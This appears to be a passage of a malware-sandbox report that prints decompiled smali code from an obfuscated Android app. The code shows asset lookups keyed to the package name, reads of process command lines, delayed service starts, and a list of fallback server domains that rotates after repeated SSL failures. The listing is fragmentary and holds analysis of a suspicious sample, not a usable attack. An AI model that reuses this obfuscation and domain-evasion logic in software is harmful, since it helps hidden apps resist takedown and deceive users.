49invoke-direct {v1, v2, v3}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
51invoke-virtual {v0, v1}, Landroid/app/Service;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
52cond_46:
53iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/Grhkl;->Odjrct:Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;
55invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->LmcGi(Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;)Lcom/czybg/eqtbdmzpklrgyns/qwAiT;
56move-result-object v0
57const/4 v1, 0x0
58iput-boolean v1, v0, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->xnLvoQ:Z
59new-instance v1, Landroid/os/Handler;
61invoke-static {}, Landroid/os/Looper;->getMainLooper()Landroid/os/Looper;
62move-result-object v2
64invoke-direct {v1, v2}, Landroid/os/Handler;-><init>(Landroid/os/Looper;)V
65new-instance v2, Lcom/czybg/eqtbdmzpklrgyns/iHOqmnuw;
67invoke-direct {v2, v0}, Lcom/czybg/eqtbdmzpklrgyns/iHOqmnuw;-><init>(Lcom/czybg/eqtbdmzpklrgyns/qwAiT;)V
68const-wide/16 v3, 0x2710
70invoke-virtual {v1, v2, v3, v4}, Landroid/os/Handler;->postDelayed(Ljava/lang/Runnable;J)Z
71return-void
Cross References
APIs
  • android.content.Context.getAssets
  • android.content.res.AssetManager.list
  • java.util.Arrays.asList
  • java.util.ArrayList.<init>
  • java.util.ArrayList.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • java.lang.String.replaceAll
  • android.content.Context.getPackageName
  • java.lang.String.equals
Strings
  • [^a-zA-Z0-9]
Position Instruction Meta Information
0try_start_0: new-instance v0, Ljava/util/ArrayList;
2invoke-virtual {p0}, Landroid/content/Context;->getAssets()Landroid/content/res/AssetManager;
3move-result-object v1
5const-string v2, ""
7invoke-virtual {v1, v2}, Landroid/content/res/AssetManager;->list(Ljava/lang/String;)[Ljava/lang/String;
8move-result-object v1
10invoke-static {v1}, Ljava/util/Arrays;->asList([Ljava/lang/Object;)Ljava/util/List;
11move-result-object v1
13invoke-direct {v0, v1}, Ljava/util/ArrayList;-><init>(Ljava/util/Collection;)V
15invoke-virtual {v0}, Ljava/util/ArrayList;->iterator()Ljava/util/Iterator;
16move-result-object v1
17cond_17:
18invoke-interface {v1}, Ljava/util/Iterator;->hasNext()Z
19move-result v0
20if-eqz v0, :cond_3f
22invoke-interface {v1}, Ljava/util/Iterator;->next()Ljava/lang/Object;
23move-result-object v0
24check-cast v0, Ljava/lang/String;
26const-string v2, "[^a-zA-Z0-9]"
28const-string v3, ""
30invoke-virtual {v0, v2, v3}, Ljava/lang/String;->replaceAll(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
31move-result-object v2
33invoke-virtual {p0}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
34move-result-object v3
36invoke-static {v3}, Lcom/czybg/eqtbdmzpklrgyns/HLqFdR;->DiXsQ(Ljava/lang/String;)Ljava/lang/String;
37move-result-object v3
39invoke-virtual {v2, v3}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
40move-result v2
41if-eqz v2, :cond_17
43invoke-static {p0, v0}, Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;->DiXsQ(Landroid/content/Context;Ljava/lang/String;)Ljava/lang/String;
44try_end_3c: move-result-object v0
45goto_3d: return-object v0
46catch_3e: move-exception v0
47cond_3f:
48const-string v0, ""
49goto/16 :goto_3d
Cross References
APIs
  • java.lang.Integer.valueOf
  • java.lang.String.format
  • com.czybg.eqtbdmzpklrgyns.zlSgts.Odjrct
  • java.lang.String.trim
  • android.text.TextUtils.isEmpty
  • com.czybg.eqtbdmzpklrgyns.jAdeqNK.DiXsQ
  • java.lang.String.replace
Strings
  • /proc/%d/cmdline
  • (
  • )
Position Instruction Meta Information
0const/4 v5, 0x1
1const/4 v0, 0x0
2try_start_2:
3const-string v1, "/proc/%d/cmdline"
4const/4 v2, 0x1
5new-array v2, v2, [Ljava/lang/Object;
6const/4 v3, 0x0
8invoke-static {p0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
9move-result-object v4
10aput-object v4, v2, v3
12invoke-static {v1, v2}, Ljava/lang/String;->format(Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/String;
13move-result-object v1
15invoke-static {v1}, Lcom/czybg/eqtbdmzpklrgyns/zlSgts;->Odjrct(Ljava/lang/String;)Ljava/lang/String;
16move-result-object v1
18invoke-virtual {v1}, Ljava/lang/String;->trim()Ljava/lang/String;
19try_end_19: move-result-object v0
20goto_1a:
21invoke-static {v0}, Landroid/text/TextUtils;->isEmpty(Ljava/lang/CharSequence;)Z
22move-result v1
23if-eqz v1, :cond_38
25invoke-static {p0}, Lcom/czybg/eqtbdmzpklrgyns/jAdeqNK;->DiXsQ(I)Lcom/czybg/eqtbdmzpklrgyns/jAdeqNK;
26move-result-object v0
28iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/jAdeqNK;->DiXsQ:[Ljava/lang/String;
29aget-object v0, v0, v5
31const-string v1, "("
33const-string v2, ""
35invoke-virtual {v0, v1, v2}, Ljava/lang/String;->replace(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;
36move-result-object v0
38const-string v1, ")"
40const-string v2, ""
42invoke-virtual {v0, v1, v2}, Ljava/lang/String;->replace(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;
43move-result-object v0
44cond_38: return-object v0
45catch_39: move-exception v1
46goto/16 :goto_1a
Cross References
APIs
  • java.lang.StringBuilder.<init>
  • java.io.FileReader.<init>
  • java.io.BufferedReader.<init>
  • java.io.BufferedReader.readLine
  • java.lang.StringBuilder.append
  • java.io.BufferedReader.readLine
  • java.lang.StringBuilder.toString
  • java.io.BufferedReader.close
Strings
  • \n
Position Instruction Meta Information
0const/4 v2, 0x0
1try_start_1: new-instance v3, Ljava/lang/StringBuilder;
3invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V
4new-instance v1, Ljava/io/BufferedReader;
5new-instance v0, Ljava/io/FileReader;
7invoke-direct {v0, p0}, Ljava/io/FileReader;-><init>(Ljava/lang/String;)V
9invoke-direct {v1, v0}, Ljava/io/BufferedReader;-><init>(Ljava/io/Reader;)V
10try_end_10:
11invoke-virtual {v1}, Ljava/io/BufferedReader;->readLine()Ljava/lang/String;
12move-result-object v2
14const-string v0, ""
15goto_16: if-eqz v2, :cond_26
17invoke-virtual {v3, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
18move-result-object v0
20invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
22const-string v0, "\n"
24invoke-virtual {v1}, Ljava/io/BufferedReader;->readLine()Ljava/lang/String;
25move-result-object v2
26goto/16 :goto_16
27cond_26:
28invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
29try_end_29: move-result-object v0
31invoke-virtual {v1}, Ljava/io/BufferedReader;->close()V
32return-object v0
33catchall_2e: move-exception v0
34move-object v1, v2
35goto_30: if-eqz v1, :cond_35
37invoke-virtual {v1}, Ljava/io/BufferedReader;->close()V
38cond_35: throw v0
39catchall_36: move-exception v0
40goto/16 :goto_30
Cross References
APIs
  • java.util.ArrayList.<init>
  • java.util.List.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • java.util.List.add
  • java.util.List.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • java.util.List.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • java.lang.String.equals
  • java.util.List.add
Position Instruction Meta Information
0const/4 v7, 0x0
1monitor-enter p0
2try_start_2: new-instance v8, Ljava/util/ArrayList;
4invoke-direct {v8}, Ljava/util/ArrayList;-><init>()V
6invoke-interface {p1}, Ljava/util/List;->iterator()Ljava/util/Iterator;
7move-result-object v9
8goto_b:
9invoke-interface {v9}, Ljava/util/Iterator;->hasNext()Z
10move-result v1
11if-eqz v1, :cond_27
13invoke-interface {v9}, Ljava/util/Iterator;->next()Ljava/lang/Object;
14move-result-object v2
15check-cast v2, Ljava/lang/String;
16new-instance v1, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
17const-wide/16 v3, 0x0
18const/4 v5, 0x0
19const/4 v6, 0x0
21invoke-direct/range {v1 .. v6}, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;-><init>(Ljava/lang/String;JZZ)V
23invoke-interface {v8, v1}, Ljava/util/List;->add(Ljava/lang/Object;)Z
24try_end_23: goto/16 :goto_b
25catchall_24: move-exception v1
26monitor-exit p0
27throw v1
28cond_27:
29invoke-interface {v8}, Ljava/util/List;->iterator()Ljava/util/Iterator;
30move-result-object v3
31goto_2b:
32invoke-interface {v3}, Ljava/util/Iterator;->hasNext()Z
33move-result v1
34if-eqz v1, :cond_5e
36invoke-interface {v3}, Ljava/util/Iterator;->next()Ljava/lang/Object;
37move-result-object v1
38move-object v0, v1
39check-cast v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
40move-object v2, v0
42sget-object v1, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->Odjrct:Ljava/util/List;
44invoke-interface {v1}, Ljava/util/List;->iterator()Ljava/util/Iterator;
45move-result-object v4
46cond_3f:
47invoke-interface {v4}, Ljava/util/Iterator;->hasNext()Z
48move-result v1
49if-eqz v1, :cond_67
51invoke-interface {v4}, Ljava/util/Iterator;->next()Ljava/lang/Object;
52move-result-object v1
53check-cast v1, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
55iget-object v1, v1, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->DiXsQ:Ljava/lang/String;
57iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->DiXsQ:Ljava/lang/String;
59invoke-virtual {v1, v5}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
60move-result v1
61if-eqz v1, :cond_3f
62const/4 v1, 0x1
63goto_56: if-nez v1, :cond_2b
65sget-object v1, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->Odjrct:Ljava/util/List;
67invoke-interface {v1, v2}, Ljava/util/List;->add(Ljava/lang/Object;)Z
68goto/16 :goto_2b
69cond_5e:
70iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;
72sget-object v2, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->Odjrct:Ljava/util/List;
74invoke-virtual {v1, v2}, Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;->DiXsQ(Ljava/util/List;)V
75try_end_65: monitor-exit p0
76return-void
77cond_67: move v1, v7
78goto/16 :goto_56
Cross References
APIs
  • java.util.ArrayList.<init>
  • java.util.List.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • java.util.List.add
  • java.util.List.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • java.util.List.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • java.lang.String.equals
  • java.util.List.add
Position Instruction Meta Information
0const/4 v7, 0x0
1monitor-enter p0
2try_start_2: new-instance v8, Ljava/util/ArrayList;
4invoke-direct {v8}, Ljava/util/ArrayList;-><init>()V
6invoke-interface {p1}, Ljava/util/List;->iterator()Ljava/util/Iterator;
7move-result-object v9
8goto_b:
9invoke-interface {v9}, Ljava/util/Iterator;->hasNext()Z
10move-result v1
11if-eqz v1, :cond_27
13invoke-interface {v9}, Ljava/util/Iterator;->next()Ljava/lang/Object;
14move-result-object v2
15check-cast v2, Ljava/lang/String;
16new-instance v1, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
17const-wide/16 v3, 0x0
18const/4 v5, 0x0
19const/4 v6, 0x0
21invoke-direct/range {v1 .. v6}, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;-><init>(Ljava/lang/String;JZZ)V
23invoke-interface {v8, v1}, Ljava/util/List;->add(Ljava/lang/Object;)Z
24try_end_23: goto/16 :goto_b
25catchall_24: move-exception v1
26monitor-exit p0
27throw v1
28cond_27:
29invoke-interface {v8}, Ljava/util/List;->iterator()Ljava/util/Iterator;
30move-result-object v3
31goto_2b:
32invoke-interface {v3}, Ljava/util/Iterator;->hasNext()Z
33move-result v1
34if-eqz v1, :cond_5e
36invoke-interface {v3}, Ljava/util/Iterator;->next()Ljava/lang/Object;
37move-result-object v1
38move-object v0, v1
39check-cast v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
40move-object v2, v0
42sget-object v1, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->LmcGi:Ljava/util/List;
44invoke-interface {v1}, Ljava/util/List;->iterator()Ljava/util/Iterator;
45move-result-object v4
46cond_3f:
47invoke-interface {v4}, Ljava/util/Iterator;->hasNext()Z
48move-result v1
49if-eqz v1, :cond_67
51invoke-interface {v4}, Ljava/util/Iterator;->next()Ljava/lang/Object;
52move-result-object v1
53check-cast v1, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
55iget-object v1, v1, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->DiXsQ:Ljava/lang/String;
57iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->DiXsQ:Ljava/lang/String;
59invoke-virtual {v1, v5}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
60move-result v1
61if-eqz v1, :cond_3f
62const/4 v1, 0x1
63goto_56: if-nez v1, :cond_2b
65sget-object v1, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->LmcGi:Ljava/util/List;
67invoke-interface {v1, v2}, Ljava/util/List;->add(Ljava/lang/Object;)Z
68goto/16 :goto_2b
69cond_5e:
70iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;
72sget-object v2, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->LmcGi:Ljava/util/List;
74invoke-virtual {v1, v2}, Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;->Odjrct(Ljava/util/List;)V
75try_end_65: monitor-exit p0
76return-void
77cond_67: move v1, v7
78goto/16 :goto_56
Cross References
APIs
  • java.util.List.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • java.lang.System.currentTimeMillis
  • java.util.Collections.sort
  • java.util.List.get
  • java.lang.System.currentTimeMillis
  • java.util.List.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • java.lang.String.equals
  • java.lang.System.currentTimeMillis
Position Instruction Meta Information
0const-wide/16 v4, 0x0
1const/4 v1, 0x1
2const/4 v0, 0x0
3monitor-enter p0
4try_start_5: instance-of v2, p1, Ljavax/net/ssl/SSLHandshakeException;
5if-eqz v2, :cond_b1
6sget v0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->DiXsQ:I
7add-int/lit8 v0, v0, 0x1
8sput v0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->DiXsQ:I
9const/16 v2, 0xa
10if-lt v0, v2, :cond_ae
11const/4 v0, 0x0
13invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->DiXsQ(Z)Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
14move-result-object v0
15if-eqz v0, :cond_38
16move-object v2, v0
17goto_1b:
18sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->Odjrct:Ljava/util/List;
20invoke-interface {v0}, Ljava/util/List;->iterator()Ljava/util/Iterator;
21move-result-object v3
22goto_21:
23invoke-interface {v3}, Ljava/util/Iterator;->hasNext()Z
24move-result v0
25if-eqz v0, :cond_7f
27invoke-interface {v3}, Ljava/util/Iterator;->next()Ljava/lang/Object;
28move-result-object v0
29check-cast v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
30iget-boolean v4, v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->LmcGi:Z
31if-eqz v4, :cond_21
32const/4 v4, 0x0
33iput-boolean v4, v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->LmcGi:Z
34try_end_34: goto/16 :goto_21
35catchall_35: move-exception v0
36monitor-exit p0
37throw v0
38cond_38: const/4 v0, 0x1
39try_start_39:
40invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->DiXsQ(Z)Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
41move-result-object v0
42if-eqz v0, :cond_41
43move-object v2, v0
44goto/16 :goto_1b
45cond_41:
46iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;
48invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;->LmcGi()J
49move-result-wide v2
50cmp-long v0, v2, v4
51if-nez v0, :cond_69
53iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;
55invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
56move-result-wide v2
58invoke-virtual {v0, v2, v3}, Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;->DiXsQ(J)V
59goto_54:
60sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->Odjrct:Ljava/util/List;
61new-instance v2, Lcom/czybg/eqtbdmzpklrgyns/DoHnmwOG;
63invoke-direct {v2, p0}, Lcom/czybg/eqtbdmzpklrgyns/DoHnmwOG;-><init>(Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;)V
65invoke-static {v0, v2}, Ljava/util/Collections;->sort(Ljava/util/List;Ljava/util/Comparator;)V
67sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->Odjrct:Ljava/util/List;
68const/4 v2, 0x0
70invoke-interface {v0, v2}, Ljava/util/List;->get(I)Ljava/lang/Object;
71move-result-object v0
72check-cast v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
73move-object v2, v0
74goto/16 :goto_1b
75cond_69:
76invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
77move-result-wide v2
79iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;
81invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;->LmcGi()J
82move-result-wide v4
83sub-long/2addr v2, v4
84const-wide/32 v4, 0x240c8400
85cmp-long v0, v2, v4
86if-lez v0, :cond_54
88invoke-direct {p0}, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->LmcGi()V
89goto/16 :goto_54
90cond_7f:
91sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->Odjrct:Ljava/util/List;
93invoke-interface {v0}, Ljava/util/List;->iterator()Ljava/util/Iterator;
94move-result-object v3
95cond_85:
96invoke-interface {v3}, Ljava/util/Iterator;->hasNext()Z
97move-result v0
98if-eqz v0, :cond_ab
100invoke-interface {v3}, Ljava/util/Iterator;->next()Ljava/lang/Object;
101move-result-object v0
102check-cast v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
104iget-object v4, v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->DiXsQ:Ljava/lang/String;
106iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->DiXsQ:Ljava/lang/String;
108invoke-virtual {v4, v5}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
109move-result v4
110if-eqz v4, :cond_85
111const/4 v2, 0x1
112iput-boolean v2, v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->LmcGi:Z
114invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
115move-result-wide v2
116iput-wide v2, v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->Odjrct:J
118iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;
120sget-object v2, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->Odjrct:Ljava/util/List;
122invoke-virtual {v0, v2}, Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;->DiXsQ(Ljava/util/List;)V
123cond_ab: const/4 v0, 0x0
124sput v0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->DiXsQ:I
125try_end_ae: move v0, v1
126goto_af: monitor-exit p0
127return v0
128cond_b1: const/4 v1, 0x0
129try_start_b2: sput v1, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->DiXsQ:I
131iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;
132const-wide/16 v2, 0x0
134invoke-virtual {v1, v2, v3}, Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;->DiXsQ(J)V
135try_end_bb: goto/16 :goto_af
Cross References
APIs
  • java.util.concurrent.ConcurrentHashMap.isEmpty
  • java.util.concurrent.ConcurrentHashMap.entrySet
  • java.util.Set.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • java.util.Map$Entry.getValue
  • java.util.Map$Entry.getKey
  • java.lang.Integer.intValue
  • com.czybg.eqtbdmzpklrgyns.MfOxe.<init>
  • android.os.AsyncTask.executeOnExecutor
  • java.lang.Exception.printStackTrace
  • android.os.AsyncTask.execute
Position Instruction Meta Information
0const/4 v6, 0x0
2iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->xnLvoQ:Ljava/util/concurrent/ConcurrentHashMap;
4invoke-virtual {v0}, Ljava/util/concurrent/ConcurrentHashMap;->isEmpty()Z
5move-result v0
6if-eqz v0, :cond_a
7goto_9: return-void
8cond_a: iget-boolean v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->uKFQsLn:Z
9if-nez v0, :cond_9
11iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->xnLvoQ:Ljava/util/concurrent/ConcurrentHashMap;
13invoke-virtual {v0}, Ljava/util/concurrent/ConcurrentHashMap;->entrySet()Ljava/util/Set;
14move-result-object v0
16invoke-interface {v0}, Ljava/util/Set;->iterator()Ljava/util/Iterator;
17move-result-object v2
18cond_18:
19invoke-interface {v2}, Ljava/util/Iterator;->hasNext()Z
20move-result v0
21if-eqz v0, :cond_9
23invoke-interface {v2}, Ljava/util/Iterator;->next()Ljava/lang/Object;
24move-result-object v0
25check-cast v0, Ljava/util/Map$Entry;
27invoke-interface {v0}, Ljava/util/Map$Entry;->getValue()Ljava/lang/Object;
28move-result-object v1
29check-cast v1, Lcom/czybg/eqtbdmzpklrgyns/phHwgb;
30if-eqz v1, :cond_32
32invoke-virtual {v1}, Lcom/czybg/eqtbdmzpklrgyns/phHwgb;->DiXsQ()Z
33move-result v1
34if-nez v1, :cond_18
35cond_32:
36invoke-interface {v0}, Ljava/util/Map$Entry;->getKey()Ljava/lang/Object;
37move-result-object v0
38check-cast v0, Ljava/lang/Integer;
40invoke-virtual {v0}, Ljava/lang/Integer;->intValue()I
41move-result v0
42const/4 v1, 0x1
43try_start_3d: iput-boolean v1, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->uKFQsLn:Z
45iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->CyGFDR:Lcom/czybg/eqtbdmzpklrgyns/BtXsH;
46new-instance v2, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;
48iget-object v3, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->jVOak:Landroid/content/Context;
50iget-object v4, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->LmcGi:Ljava/lang/String;
52iget-object v5, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->Odjrct:Ljava/lang/String;
54invoke-direct {v2, v3, v4, v5}, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;-><init>(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;)V
56invoke-virtual {v2}, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->DiXsQ()Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;
57move-result-object v2
59invoke-virtual {v2}, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->Odjrct()Lorg/json/JSONObject;
60move-result-object v2
61new-instance v3, Lcom/czybg/eqtbdmzpklrgyns/JEgpc;
63invoke-direct {v3, p0, v0}, Lcom/czybg/eqtbdmzpklrgyns/JEgpc;-><init>(Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;I)V
64new-instance v4, Lcom/czybg/eqtbdmzpklrgyns/MfOxe;
66invoke-direct {v4, v1, v0, v2, v3}, Lcom/czybg/eqtbdmzpklrgyns/MfOxe;-><init>(Lcom/czybg/eqtbdmzpklrgyns/BtXsH;ILorg/json/JSONObject;Lcom/czybg/eqtbdmzpklrgyns/biaGZ;)V
67sget v0, Landroid/os/Build$VERSION;->SDK_INT:I
68const/16 v1, 0xb
69if-lt v0, v1, :cond_74
71sget-object v0, Landroid/os/AsyncTask;->THREAD_POOL_EXECUTOR:Ljava/util/concurrent/Executor;
72const/4 v1, 0x0
73new-array v1, v1, [Ljava/lang/Void;
75invoke-virtual {v4, v0, v1}, Landroid/os/AsyncTask;->executeOnExecutor(Ljava/util/concurrent/Executor;[Ljava/lang/Object;)Landroid/os/AsyncTask;
76try_end_6c: goto/16 :goto_9
77catch_6d: move-exception v0
78iput-boolean v6, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->uKFQsLn:Z
80invoke-virtual {v0}, Ljava/lang/Exception;->printStackTrace()V
81goto/16 :goto_9
82cond_74: const/4 v0, 0x0
83try_start_75: new-array v0, v0, [Ljava/lang/Void;
85invoke-virtual {v4, v0}, Landroid/os/AsyncTask;->execute([Ljava/lang/Object;)Landroid/os/AsyncTask;
86try_end_7a: goto/16 :goto_9
Cross References
APIs
  • org.json.JSONObject.optJSONArray
  • org.json.JSONArray.length
  • org.json.JSONArray.getString
  • java.util.List.add
  • org.json.JSONObject.optJSONArray
  • org.json.JSONArray.length
  • org.json.JSONArray.getString
  • java.util.List.add
Strings
  • domains
  • reservedDomains
Position Instruction Meta Information
0const/4 v1, 0x0
1new-instance v2, Lcom/czybg/eqtbdmzpklrgyns/peOiD;
3invoke-direct {v2}, Lcom/czybg/eqtbdmzpklrgyns/peOiD;-><init>()V
5const-string v0, "domains"
7invoke-virtual {p0, v0}, Lorg/json/JSONObject;->optJSONArray(Ljava/lang/String;)Lorg/json/JSONArray;
8move-result-object v3
9if-eqz v3, :cond_21
10move v0, v1
11goto_f:
12invoke-virtual {v3}, Lorg/json/JSONArray;->length()I
13move-result v4
14if-ge v0, v4, :cond_21
16iget-object v4, v2, Lcom/czybg/eqtbdmzpklrgyns/peOiD;->DiXsQ:Ljava/util/List;
18invoke-virtual {v3, v0}, Lorg/json/JSONArray;->getString(I)Ljava/lang/String;
19move-result-object v5
21invoke-interface {v4, v5}, Ljava/util/List;->add(Ljava/lang/Object;)Z
22add-int/lit8 v0, v0, 0x1
23goto/16 :goto_f
24cond_21:
25const-string v0, "reservedDomains"
27invoke-virtual {p0, v0}, Lorg/json/JSONObject;->optJSONArray(Ljava/lang/String;)Lorg/json/JSONArray;
28move-result-object v0
29if-eqz v3, :cond_3b
30goto_29:
31invoke-virtual {v0}, Lorg/json/JSONArray;->length()I
32move-result v3
33if-ge v1, v3, :cond_3b
35iget-object v3, v2, Lcom/czybg/eqtbdmzpklrgyns/peOiD;->Odjrct:Ljava/util/List;
37invoke-virtual {v0, v1}, Lorg/json/JSONArray;->getString(I)Ljava/lang/String;
38move-result-object v4
40invoke-interface {v3, v4}, Ljava/util/List;->add(Ljava/lang/Object;)Z
41add-int/lit8 v1, v1, 0x1
42goto/16 :goto_29
43cond_3b: return-object v2
Cross References
APIs
  • org.json.JSONArray.<init>
  • java.util.List.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • org.json.JSONArray.put
  • android.content.SharedPreferences.edit
  • org.json.JSONArray.toString
  • android.content.SharedPreferences$Editor.putString
  • android.content.SharedPreferences$Editor.commit
Strings
  • domains
Position Instruction Meta Information
0new-instance v1, Lorg/json/JSONArray;
2invoke-direct {v1}, Lorg/json/JSONArray;-><init>()V
4invoke-interface {p1}, Ljava/util/List;->iterator()Ljava/util/Iterator;
5move-result-object v2
6goto_9:
7invoke-interface {v2}, Ljava/util/Iterator;->hasNext()Z
8move-result v0
9if-eqz v0, :cond_1d
11invoke-interface {v2}, Ljava/util/Iterator;->next()Ljava/lang/Object;
12move-result-object v0
13check-cast v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
15invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->DiXsQ()Lorg/json/JSONObject;
16move-result-object v0
18invoke-virtual {v1, v0}, Lorg/json/JSONArray;->put(Ljava/lang/Object;)Lorg/json/JSONArray;
19goto/16 :goto_9
20cond_1d:
21iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;->DiXsQ:Landroid/content/SharedPreferences;
23invoke-interface {v0}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
24move-result-object v0
26const-string v2, "domains"
